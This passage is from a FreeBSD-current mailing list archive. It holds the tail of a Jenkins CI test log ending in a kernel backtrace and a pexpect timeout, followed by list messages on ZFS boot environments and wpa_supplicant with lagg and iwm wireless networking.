lib/libarchive/functional_test:test_write_format_7zip_empty_files -> passed [0.234s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_large_bzip2 -> passed [7.183s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_large_copy -> passed [1.369s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_large_deflate -> passed [1.960s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_large_lzma1 -> passed [11.721s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_large_lzma2 -> passed [10.045s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_7zip_large_ppmd -> passed [0.980s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_ar -> passed [0.124s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_cpio -> passed [0.131s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_cpio_empty -> passed [0.110s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_cpio_newc -> passed [0.128s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_cpio_odc -> passed [0.108s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_gnutar -> passed [0.107s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_gnutar_filenames -> passed [0.218s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_gnutar_linknames -> passed [0.200s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_iso9660 -> passed [0.132s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_iso9660_boot -> passed [0.120s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_iso9660_empty -> passed [0.193s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_iso9660_filename -> passed [0.477s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_iso9660_zisofs -> passed [0.197s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree -> passed [0.101s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_absolute_path -> passed [0.118s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_classic -> passed [0.129s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_classic_indent -> passed [0.094s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_fflags -> passed [0.103s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_no_leading_dotslash -> passed [0.100s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_no_separator -> passed [0.106s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_mtree_quoted_filename -> passed [0.102s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_pax -> passed [0.110s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_raw -> passed [0.107s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_raw_b64 -> passed [0.111s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_shar_empty -> passed [0.100s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_tar -> passed [0.212s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_tar_empty -> passed [0.109s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_tar_sparse -> passed [0.110s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_tar_ustar -> passed [0.110s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_tar_v7tar -> passed [0.121s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_warc -> passed [0.099s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_warc_empty -> passed [0.098s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_xar -> passed [0.097s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_xar_empty -> passed [0.092s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip -> passed [0.105s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip64 -> passed [0.103s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_compression_store -> passed [0.124s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_empty -> passed [0.117s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_empty_zip64 -> passed [0.109s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_file -> passed [0.102s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_file_zip64 -> passed [0.111s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_large -> passed [0.212s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_traditional_pkware_encryption -> passed [0.124s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_winzip_aes128_encryption -> passed [0.326s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_winzip_aes256_encryption -> passed [0.523s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_format_zip_zip64_oversize -> passed [0.116s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_open_memory -> passed [0.111s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_read_format_zip -> passed [0.105s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_read_format_zip64 -> passed [0.107s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_read_format_zip64_improved_streaming -> passed [0.109s] [192.168.10.2] out: lib/libarchive/functional_test:test_write_read_format_zip_improved_streaming -> passed [0.139s] [192.168.10.2] out: lib/libarchive/functional_test:test_zip_filename_encoding_CP932 -> passed [0.142s] [192.168.10.2] out: lib/libarchive/functional_test:test_zip_filename_encoding_EUCJP -> passed [0.160s] [192.168.10.2] out: lib/libarchive/functional_test:test_zip_filename_encoding_KOI8R -> passed [0.129s] [192.168.10.2] out: lib/libarchive/functional_test:test_zip_filename_encoding_Russian_Russia -> passed [0.117s] [192.168.10.2] out: lib/libarchive/functional_test:test_zip_filename_encoding_UTF8 -> passed [0.105s] [192.168.10.2] out: lib/libarchive/functional_test:test_zip_filename_encoding_ru_RU_CP1251 -> passed [0.128s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:bad_library_directories -> passed [0.026s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:first_library_directory -> passed [0.021s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:last_library_directory -> passed [0.020s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:middle_library_directory -> passed [0.020s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:missing_library -> passed [0.019s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:single_library_directory -> passed [0.021s] [192.168.10.2] out: libexec/rtld-elf/ld_library_pathfds:wrong_library_directories -> passed [0.018s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_empty -> passed [0.242s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_file -> passed [0.159s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_ignore -> passed [0.102s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_inline -> passed [0.251s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_match -> passed [0.163s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_multiple -> passed [0.149s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_negated -> passed [0.152s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:eflag_save -> passed [0.111s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:invalid_umask -> passed [0.056s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_empty -> passed [0.091s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_file -> passed [0.135s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_ignore -> passed [0.111s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_inline -> passed [0.285s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_match -> passed [0.223s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_multiple -> passed [0.218s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_negated -> passed [0.145s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:oflag_save -> passed [0.097s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:sflag_eq_ne -> passed [0.185s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:sflag_exit -> passed [0.241s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:sflag_ignore -> passed [0.103s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:sflag_signal -> passed [0.154s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:stdin -> passed [0.052s] [192.168.10.2] out: libexec/atf/atf-check/atf-check_test:xflag -> passed [0.076s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:equal -> passed [0.205s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:experr_mismatch -> passed [0.126s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:expout_mismatch -> passed [0.127s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:flush_stdout_on_death -> passed [1.145s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:info_ok -> passed [0.176s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:null_stderr -> passed [0.124s] [192.168.10.2] out: libexec/atf/atf-sh/atf_check_test:null_stdout -> passed [0.126s] [192.168.10.2] out: libexec/atf/atf-sh/config_test:get -> passed [0.148s] [192.168.10.2] out: libexec/atf/atf-sh/config_test:has -> passed [0.142s] [192.168.10.2] out: libexec/atf/atf-sh/integration_test:arguments -> passed [0.094s] [192.168.10.2] out: libexec/atf/atf-sh/integration_test:custom_shell__command_line -> passed [0.089s] [192.168.10.2] out: libexec/atf/atf-sh/integration_test:custom_shell__shebang -> passed [0.074s] [192.168.10.2] out: libexec/atf/atf-sh/integration_test:missing_script -> passed [0.079s] [192.168.10.2] out: libexec/atf/atf-sh/integration_test:no_args -> passed [0.074s] [192.168.10.2] out: libexec/atf/atf-sh/integration_test:set_e -> passed [0.086s] [192.168.10.2] out: libexec/atf/atf-sh/normalize_test:main -> passed [0.088s] [192.168.10.2] out: libexec/atf/atf-sh/tc_test:default_status -> passed [0.154s] [192.168.10.2] out: libexec/atf/atf-sh/tc_test:missing_body -> passed [0.065s] [192.168.10.2] out: libexec/atf/atf-sh/tp_test:srcdir -> passed [0.161s] [192.168.10.2] out: [192.168.10.2] out: Results file id is usr_tests.20160728-203950-917866 [192.168.10.2] out: Results saved to /root/.kyua/store/results.usr_tests.20160728-203950-917866.db [192.168.10.2] out: [192.168.10.2] out: 5724/5725 passed (1 failed) [192.168.10.2] out: Warning: run() received nonzero return code 1 while executing 'kyua test'! [192.168.10.2] run: kyua report --verbose --results-filter passed,skipped,xfail,broken,failed --output test-report.txt [192.168.10.2] run: kyua report-junit --output=test-report.xml [192.168.10.2] run: shutdown -p now [192.168.10.2] out: Shutdown NOW! [192.168.10.2] out: shutdown: [pid 82451] [192.168.10.2] out: kyuatestprompt # lock order reversal: 1st 0xfffff80009d5f9a0 ufs (ufs) @ /builds/workspace/FreeBSD_HEAD/src/sys/kern/vfs_mount.c:1244 2nd 0xfffff80009d509a0 devfs (devfs) @ /builds/workspace/FreeBSD_HEAD/src/sys/ufs/ffs/ffs_vfsops.c:1590 stack backtrace: #0 0xffffffff80aa9e60 at witness_debugger+0x70 #1 0xffffffff80aa9d54 at witness_checkorder+0xe54 #2 0xffffffff80a22f02 at __lockmgr_args+0x4c2 #3 0xffffffff80af9bec at vop_stdlock+0x3c #4 0xffffffff81018410 at VOP_LOCK1_APV+0xe0 #5 0xffffffff80b1ac9a at _vn_lock+0x9a #6 0xffffffff80d0b3b2 at ffs_sync+0x2f2 #7 0xffffffff80b1c370 at vfs_write_suspend+0x180 #8 0xffffffff80b1c5b7 at vfs_write_suspend_umnt+0x47 #9 0xffffffff80d0ac74 at ffs_unmount+0x54 #10 0xffffffff80b03784 at dounmount+0x6f4 #11 0xffffffff80b02ffd at sys_unmount+0x35d #12 0xffffffff80ebbb7b at amd64_syscall+0x2db #13 0xffffffff80e9be0b at Xfast_syscall+0xfb GEOM_CONCAT: Device concat.0qRhLH created (id=710705534). GEOM_CONCAT: Disk md0 attached to concat.0qRhLH. GEOM_CONCAT: Disk md1 attached to concat.0qRhLH. GEOM_CONCAT: Disk md2 attached to concat.0qRhLH. GEOM_CONCAT: Device concat/concat.0qRhLH activated. GEOM_CONCAT: Disk md2 removed from concat.0qRhLH. GEOM_CONCAT: Device concat/concat.0qRhLH deactivated. GEOM_CONCAT: Disk md1 removed from concat.0qRhLH. GEOM_CONCAT: Disk md0 removed from concat.0qRhLH. GEOM_CONCAT: Device concat.0qRhLH destroyed. GEOM_CONCAT: Device concat.AJR9Cw created (id=1589844515). GEOM_CONCAT: Disk md0 attached to concat.AJR9Cw. GEOM_CONCAT: Disk md1 attached to concat.AJR9Cw. GEOM_CONCAT: Disk md2 attached to concat.AJR9Cw. GEOM_CONCAT: Device concat/concat.AJR9Cw activated. GEOM_CONCAT: Disk md2 removed from concat.AJR9Cw. GEOM_CONCAT: Device concat/concat.AJR9Cw deactivated. GEOM_CONCAT: Disk md1 removed from concat.AJR9Cw. GEOM_CONCAT: Disk md0 removed from concat.AJR9Cw. GEOM_CONCAT: Device concat.AJR9Cw destroyed. GEOM_ELI: Device md0.eli created. GEOM_ELI: EnTraceback (most recent call last): File "freebsd-ci/scripts/test/run-tests.py", line 207, in main(sys.argv) File "freebsd-ci/scripts/test/run-tests.py", line 79, in main runTest() File "freebsd-ci/scripts/test/run-tests.py", line 187, in runTest child2.expect(pexpect.EOF, timeout=1000) File "/usr/local/lib/python2.7/site-packages/pexpect/__init__.py", line 1451, in expect timeout, searchwindowsize) File "/usr/local/lib/python2.7/site-packages/pexpect/__init__.py", line 1466, in expect_list timeout, searchwindowsize) File "/usr/local/lib/python2.7/site-packages/pexpect/__init__.py", line 1568, in expect_loop raise TIMEOUT(str(err) + '\n' + str(self)) pexpect.TIMEOUT: Timeout exceeded. version: 3.3 command: /usr/sbin/bhyve args: [u'/usr/sbin/bhyve', u'-c', u'2', u'-m', u'2G', u'-AI', u'-H', u'-P', u'-g', u'0', u'-s', u'0:0,hostbridge', u'-s', u'1:0,lpc', u'-s', u'2:0,virtio-net,tap10,mac=58:9c:fc:00:00:2e', u'-s', u'3:0,ahci-hd,/net/jenkins-10.freebsd.org//builds/workspace/FreeBSD_HEAD/image/src/test.img', u'-l', u'com1,stdio', u'vm_test'] searcher: buffer (last 100 chars): 'R9Cw.\r\nGEOM_CONCAT: Device concat.AJR9Cw destroyed.\r\nGEOM_ELI: Device md0.eli created.\r\nGEOM_ELI: En' before (last 100 chars): 'R9Cw.\r\nGEOM_CONCAT: Device concat.AJR9Cw destroyed.\r\nGEOM_ELI: Device md0.eli created.\r\nGEOM_ELI: En' after: match: None match_index: None exitstatus: None flag_eof: False pid: 70886 child_fd: 4 closed: False timeout: 30 delimiter: logfile: ', mode 'w' at 0x800671150> logfile_read: None logfile_send: None maxread: 2000 ignorecase: False searchwindowsize: None delaybeforesend: 0.05 delayafterclose: 0.1 delayafterterminate: 0.1 [Pipeline] } [Pipeline] // node [Pipeline] node Running on master in /usr/local/jenkins/workspace/FreeBSD_HEAD [Pipeline] { [Pipeline] step From owner-freebsd-current@freebsd.org Thu Jul 28 21:53:56 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 60ECBBA7F8A for ; Thu, 28 Jul 2016 21:53:56 +0000 (UTC) (envelope-from ultima1252@gmail.com) Received: from mail-yw0-x22b.google.com (mail-yw0-x22b.google.com [IPv6:2607:f8b0:4002:c05::22b]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 1FDC810E9; Thu, 28 Jul 2016 21:53:56 +0000 (UTC) (envelope-from ultima1252@gmail.com) Received: by mail-yw0-x22b.google.com with SMTP id r9so99318553ywg.0; Thu, 28 Jul 2016 14:53:56 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc; bh=Hx/BX6x7I+Honc77KbQTZ67N7Ia3mniGqSBR8Yl+f9Q=; b=W5FYgCEpQH5QKeGYNODSVuCPqOgzGG1xWRwyLCf8SggBR1ZWTC0G6e0Q2rr2g0dE3H x8VkoA09NeqdFAETL3NA0DSYOTKYeqv/vIu0MwIqxLbrswgBNYAVZRiFyR3bfDx9YfZ9 7qcZ1R3ffcqm3r1mnJBUol3Ee+9KTG9HTliQnBpFXvASqpmDwV+kmkaIGVAsCdbXgdBW hqjORRRBHc8W4fiHXra235Q0/YlPiYXf46tGhF2vhqEDemLKBl1Ggikm3cooNlYOrPVg 124qiePxENSK9UYp3ybjuKJMMK5lmJnHy4oTi3NUqhxMmQHBkB/QnlcnCe892bkzY9Ot iLaQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc; bh=Hx/BX6x7I+Honc77KbQTZ67N7Ia3mniGqSBR8Yl+f9Q=; b=UFky+2IHQ+nk5XSpYRjYlw1TBReknCy8I1T67+AAMSBvMzjFNQJxuPNeLX/Iit3Kkx 5GDCyAazr69Y1apQb/jcYxIS6QEMAKGbVstt+vfTk5XyTDGt2DyqiuF4pPBh0UEiu6de A9ehNdmC0US82leRFLI2O7risEMU+66l6ee5ctrIAT1VqBa4efN8/7FU/06SGaCbDl7i 8vV9bSKR1PMu1009TJWwOiE35ztNMIoTIvNK/e5dGTqaxfb7wusXGCkCbGdi+RQTGpVs 98A5qDGSHip5eVW1gAMjhQMyKzziUxMZBbxCTF8RusM5zfaZQLv2H8NHckU16z0Zrrh9 vB3A== X-Gm-Message-State: AEkoouuDF4CjyVhS/vWeeRQ1TKzAYBZqv0CO9idaFijEv6dIVNiS95HAuRbYCPBfMGnWzllY6TuBy0em7WrneQ== X-Received: by 10.129.76.79 with SMTP id z76mr31563996ywa.33.1469742835210; Thu, 28 Jul 2016 14:53:55 -0700 (PDT) MIME-Version: 1.0 Received: by 10.129.51.150 with HTTP; Thu, 28 Jul 2016 14:53:54 -0700 (PDT) In-Reply-To: <20160728194822.GF26793@gmail.com> References: <20160728020548.GD26793@gmail.com> <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> <20160728194822.GF26793@gmail.com> From: Ultima Date: Thu, 28 Jul 2016 17:53:54 -0400 Message-ID: Subject: Re: Boot environments and zfs canmount=noauto To: avg@freebsd.org Cc: Allan Jude , freebsd-current@freebsd.org Content-Type: text/plain; charset=UTF-8 X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 21:53:56 -0000 Is this actually required? Instead of the extra steps, how about just moving/creating each dataset into each BE (or at least the ones desired) and setting them to mountpoint=inherit. With zfs_enable="YES" this should mount the dataset appropriately. Only the root BE should need canmount=noauto because if the parent dataset is not mounted the child will inherently not mount. Is this not sufficient? From owner-freebsd-current@freebsd.org Thu Jul 28 22:03:05 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id D05E6BA52EC for ; Thu, 28 Jul 2016 22:03:05 +0000 (UTC) (envelope-from ronald-lists@klop.ws) Received: from smarthost1.greenhost.nl (smarthost1.greenhost.nl [195.190.28.81]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 9B4A71764 for ; Thu, 28 Jul 2016 22:03:05 +0000 (UTC) (envelope-from ronald-lists@klop.ws) Received: from smtp.greenhost.nl ([213.108.104.138]) by smarthost1.greenhost.nl with esmtps (TLS1.2:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.84_2) (envelope-from ) id 1bStOL-0005nU-5D; Fri, 29 Jul 2016 00:02:57 +0200 Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes To: freebsd-current@freebsd.org, "Randy Westlund" Subject: Re: wpa_supplicant doesn't work with lagg References: <20160728194146.GE26793@gmail.com> Date: Fri, 29 Jul 2016 00:02:56 +0200 MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: "Ronald Klop" Message-ID: In-Reply-To: <20160728194146.GE26793@gmail.com> User-Agent: Opera Mail/12.16 (FreeBSD) X-Authenticated-As-Hash: 398f5522cb258ce43cb679602f8cfe8b62a256d1 X-Virus-Scanned: by clamav at smarthost1.samage.net X-Spam-Level: / X-Spam-Score: -0.2 X-Spam-Status: No, score=-0.2 required=5.0 tests=ALL_TRUSTED, BAYES_50 autolearn=disabled version=3.4.0 X-Scan-Signature: cd688a2151aac0590452c2fa0bd26a10 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 22:03:05 -0000 I had the same problem a while ago. For some reason you need to use this construction to set the MAC now. create_args_wlan0="wlanaddr 00:26:b9:12:34:56 country NL" I don't know why this changed. Regards, Ronald. On Thu, 28 Jul 2016 21:41:46 +0200, Randy Westlund wrote: > I'm having trouble using the lagg driver with wpa_supplicant. When I > boot with this standard configuration, my wifi works fine: > >> # Normal config. >> wlans_iwn0="wlan0" >> ifconfig_wlan0="WPA DHCP" >> ifconfig_em0="DHCP" > > But when I boot with a lagg configuration, wpa_supplicant can't connect. > >> # Lagg config. >> ifconfig_em0="up" >> ifconfig_iwn0="ether 3c:97:0e:46:70:ca" >> wlans_iwn0="wlan0" >> ifconfig_wlan0="WPA" >> cloned_interfaces="lagg0" >> ifconfig_lagg0="laggproto failover laggport em0 laggport wlan0 DHCP" > > The system spends a full 5 minutes during boot trying to send DHCP > requests before finally giving up. After boot, ifconfig shows that > wlan0 has the right ssid, but the status is 'no carrier': > >> wlan0: flags=8843 metric 0 mtu >> 1500 >> ether 3c:97:0e:46:70:ca >> nd6 options=29 >> media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) >> status: no carrier >> ssid neural_network channel 1 (2412 MHz 11g ht/40+) >> regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON >> deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS >> ampdulimit 8k -amsdutx amsdurx shortgi -stbc wme roaming MANUAL >> groups: wlan > > If I then manually kill wpa_supplicant and restart it with the same > command, it works fine. > >> /usr/sbin/wpa_supplicant -s -B -i wlan0 -c /etc/wpa_supplicant.conf -D >> bsd -P /var/run/wpa_supplicant/wlan0.pid > >> wlan0: flags=8843 metric 0 mtu >> 1500 >> ether 3c:97:0e:46:70:ca >> nd6 options=29 >> media: IEEE 802.11 Wireless Ethernet MCS mode 11ng >> status: associated >> ssid neural_network channel 1 (2412 MHz 11g ht/40+) bssid >> c4:04:15:90:f5:fd >> regdomain FCC country US authmode WPA2/802.11i privacy ON >> deftxkey UNDEF AES-CCM 2:128-bit txpower 30 bmiss 10 scanvalid >> 60 >> protmode CTS ampdulimit 64k ampdudensity 8 -amsdutx amsdurx >> shortgi >> -stbc wme roaming MANUAL >> groups: wlan > > /var/log/messages shows: > >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to UP >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to UP >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to UP >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to UP >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to UP >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to UP >> Jul 28 15:22:09 mako kernel: wlan0: link state changed to DOWN >> Jul 28 15:22:09 mako kernel: lagg0: link state changed to DOWN >> [snip] >> Jul 28 15:22:23 mako wpa_supplicant[329]: wlan0: >> CTRL-EVENT-SSID-REENABLED id=2 ssid="neural_network" >> Jul 28 15:22:23 mako wpa_supplicant[329]: wlan0: Trying to associate >> with c4:04:15:90:f5:fd (SSID='neural_network' freq=2412 MHz) >> Jul 28 15:22:23 mako kernel: wlan0: link state changed to UP >> Jul 28 15:22:23 mako kernel: lagg0: link state changed to UP >> Jul 28 15:22:23 mako wpa_supplicant[329]: wlan0: Associated with >> c4:04:15:90:f5:fd >> Jul 28 15:22:23 mako dhclient[533]: send_packet: No buffer space >> available >> Jul 28 15:22:27 mako dhclient[533]: send_packet: No buffer space >> available >> Jul 28 15:22:27 mako kernel: wlan0: link state changed to DOWN >> Jul 28 15:22:27 mako kernel: lagg0: link state changed to DOWN >> Jul 28 15:22:27 mako wpa_supplicant[329]: wlan0: >> CTRL-EVENT-DISCONNECTED bssid=c4:04:15:90:f5:fd reason=0 >> Jul 28 15:22:27 mako wpa_supplicant[329]: wlan0: >> CTRL-EVENT-SSID-TEMP-DISABLED id=2 ssid="neural_network" >> auth_failures=7 duration=90 reason=CONN_FAILED >> Jul 28 15:22:28 mako login: ROOT LOGIN (root) ON ttyv0 >> Jul 28 15:22:31 mako dhclient[533]: send_packet: Network is down >> Jul 28 15:23:06 mako last message repeated 4 times > > This is my hardware: > >> iwn0@pci0:3:0:0: class=0x028000 card=0x13118086 chip=0x00858086 >> rev=0x34 hdr=0x00 >> vendor = 'Intel Corporation' >> device = 'Centrino Advanced-N 6205 [Taylor Peak]' >> class = network > > > I know I had this working at one point on 10.2-RELEASE, but recently > I've tried both 11.0-BETA2 and 12-CURRENT and get this behavior. Any > advice for debugging? From owner-freebsd-current@freebsd.org Thu Jul 28 23:04:57 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id B2BB3BA7399; Thu, 28 Jul 2016 23:04:57 +0000 (UTC) (envelope-from ler@lerctr.org) Received: from thebighonker.lerctr.org (thebighonker.lerctr.org [IPv6:2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "thebighonker.lerctr.org", Issuer "COMODO RSA Domain Validation Secure Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 8BA371AC9; Thu, 28 Jul 2016 23:04:57 +0000 (UTC) (envelope-from ler@lerctr.org) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=lerctr.org; s=lerami; h=Message-ID:References:In-Reply-To:Subject:To:From:Date: Content-Transfer-Encoding:Content-Type:MIME-Version:Sender:Reply-To:Cc: Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender: Resent-To:Resent-Cc:Resent-Message-ID:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=tXPtOW9q7v9D8YFUEHLEfXyjEPOYIitHv3BMIt7IjpU=; b=YJNNN1Vjo5qLPlBwI0hkgOvoq6 DyNNcMI1RIvfMuIBWxiSO491aYlgHYP9LsjJm2VvsIIuezmso8vFEopcCNCOkmWlMp7GtPylgeIG8 PqYgT4/Vq8AMM35EyW1aBoF1XoOhabl51vrmLZkcSOCI6FQZizKth0iwbGSVja5WrDPw=; Received: from thebighonker.lerctr.org ([2001:470:1f0f:3ad:223:7dff:fe9e:6e8a]:51430 helo=webmail.lerctr.org) by thebighonker.lerctr.org with esmtpsa (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128) (Exim 4.87 (FreeBSD)) (envelope-from ) id 1bSuMK-000Ff3-Rh; Thu, 28 Jul 2016 18:04:56 -0500 Received: from 2001:470:1f0f:42c:b9cb:216a:6647:9bf0 by webmail.lerctr.org with HTTP (HTTP/1.1 POST); Thu, 28 Jul 2016 18:04:56 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII; format=flowed Content-Transfer-Encoding: 7bit Date: Thu, 28 Jul 2016 18:04:56 -0500 From: Larry Rosenman To: freebsd-wireless@freebsd.org, freebsd-current@freebsd.org, Adrian Chadd Subject: Re: IWM(7260), no connect In-Reply-To: <20160728023954.GA1321@pita> References: <20160728023954.GA1321@pita> Message-ID: <6421da24a2ec668667f83a3255dc247f@thebighonker.lerctr.org> X-Sender: ler@lerctr.org User-Agent: Roundcube Webmail/1.2.0 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 23:04:57 -0000 Anyone? On 2016-07-27 21:39, 